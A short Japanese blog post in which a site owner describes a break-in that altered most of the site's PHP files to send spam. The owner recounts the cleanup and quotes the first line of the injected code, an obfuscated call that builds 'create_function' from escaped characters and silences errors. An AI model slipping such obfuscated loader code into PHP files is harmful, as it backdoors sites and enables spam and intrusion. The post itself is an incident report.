不正ログインされ、phpファイルのほとんどがクラッキングされているようです。一旦全て削除しインストールし直しました。ただ、記事を抜き出す事が出来そうに無かったので、データベースはそのままです。
もちろん、使ってなかったデータベースの残骸は全て削除しました。
これが、クラッキングされたファイルから送られたと思われる迷惑メールです。全世界(たぶん)に向けて迷惑行為が当サイトを介して行われたと言う事で、申し訳有りません。同様のメールは自分も受け取っていた事は有るのですが、まさか自分のサイトからそれが送られているとは。。。。
パスワードは全て変えましたが、少々不安に残ります。データベースの中身は、ざっとは確認しました。
もしかしたら、コンテンツ(アップロードしているファイルなど)にもまぎれているのか知れません。こっちはノーチェックです。
どのようにして不正ログインして、ドメインを越えた全領域のファイルにアクセスできたのかがわかりませんが、何でも出来るようですね。
埋め込まれているコードは保存してありますがphpファイルの冒頭に
<?php $zend_framework=”\x63\162\x65\141\x74\145\x5f\146\x75\156\x63\164\x69\157\x6e”; @error_reporting(0); $zend_framework(“”,
のようなコードですが入ってます。この後意味不明の文字列が延々続きます。